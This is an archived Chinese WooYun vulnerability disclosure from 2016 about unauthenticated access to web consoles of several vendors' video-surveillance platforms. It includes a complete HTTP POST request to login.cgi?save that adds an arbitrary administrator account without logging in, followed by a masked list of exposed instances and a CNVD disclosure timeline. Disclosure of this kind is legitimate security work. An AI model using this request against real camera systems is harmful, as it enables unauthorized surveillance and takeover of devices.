乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-10: 细节已通知厂商并且等待厂商处理中 2016-03-14: 厂商已经确认,细节仅向厂商公开 2016-03-17: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2016-05-08: 细节向核心白帽子及相关领域专家公开 2016-05-18: 细节向普通白帽子公开 2016-05-28: 细节向实习白帽子公开 2016-06-12: 细节向公众公开
涉及多家厂商
涉及如下公司大华e眼 版权所有@河南大华安防科技股份有限公司
华迈千里眼 版权所有@成都华迈通信技术有限公司
鼎世千里眼 版权所有@四川鼎世安防服务有限公司
根据案例.还些产品名称为“翼”貌似与中国.电信合作,还些案例没LOGO(具体型号请登录案例测试)
翼安居.天翼卫士翼安居 翼安铺天翼慧眼189look视频看家
根据互联网案例测试发现部分产品未开启登录功能(可直接进入监控控制台),而部分产品开启了登录功能可利用post包直接添加任意管理员(无需登录,全局功能未授权访问导致)。
POST /cn/base/cgi-bin/login.cgi?save HTTP/1.1Host: 地址Content-Length: 249Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: keyenable=; login_level=0Connection: closekeyenable=1&username=admin&password=wooyun&group=0&name1=&pwd1=&group1=2&name2=&pwd2=&group2=2&name3=&pwd3=&group3=2&name4=&pwd4=&group4=2&name5=&pwd5=&group5=2&name6=&pwd6=&group6=2&name7=&pwd7=&group7=2&name8=&pwd8=&group8=2&name9=&pwd9=&group9=2
案例:
以下案例需登录验证(可利用post包直接添加管理员):**.**.**.**/cn/**.**.**.**/en/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**:83/cn/**.**.**.**:82/cn/**.**.**.**:82/cn/**.**.**.**/cn/**.**.**.**:82/cn/**.**.**.**:81/cn/**.**.**.**:81/cn/**.**.**.**:81/cn/**.**.**.**/cn/**.**.**.**:82/cn/**.**.**.**:82/cn/**.**.**.**:81/cn/**.**.**.**:100/cn/**.**.**.**:8081/cn/**.**.**.**:81/cn/以下案例未开启登录验证功能直接可进控制台:**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**/cn/**.**.**.**:100/cn/ 华迈千里眼see1000 **.**.**.**:81/cn/**.**.**.**:89/cn/**.**.**.**:81/cn/**.**.**.**:88/cn/**.**.**.**:81/cn/**.**.**.**/cn/**.**.**.**:81/cn/**.**.**.**/cn/**.**.**.**:100/cn/**.**.**.**:100/cn/**.**.**.**:81/cn/ 大华e眼 远程视频监控系统运营服务平台**.**.**.**/cn/ 翼安居.天翼卫士**.**.**.**/cn/ 翼安居 翼安铺**.**.**.**/cn/**.**.**.**:8090/cn/**.**.**.**:82/cn/**.**.**.**/cn/ 鼎世千里眼**.**.**.**:85/cn/**.**.**.**:81/cn/ 189look视频看家**.**.**.**/cn/**.**.**.**:81/cn/**.**.**.**:84/cn/**.**.**.**/cn/ 天翼慧眼**.**.**.**/cn/**.**.**.**:81/cn/**.**.**.**:8081/cn/**.**.**.**/cn/**.**.**.**:81/cn/**.**.**.**/cn/**.**.**.**:100/cn/**.**.**.**:100/cn/**.**.**.**:85/cn/
联系厂商
危害等级:高
漏洞Rank:17
确认时间:2016-03-14 15:57
CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。
暂无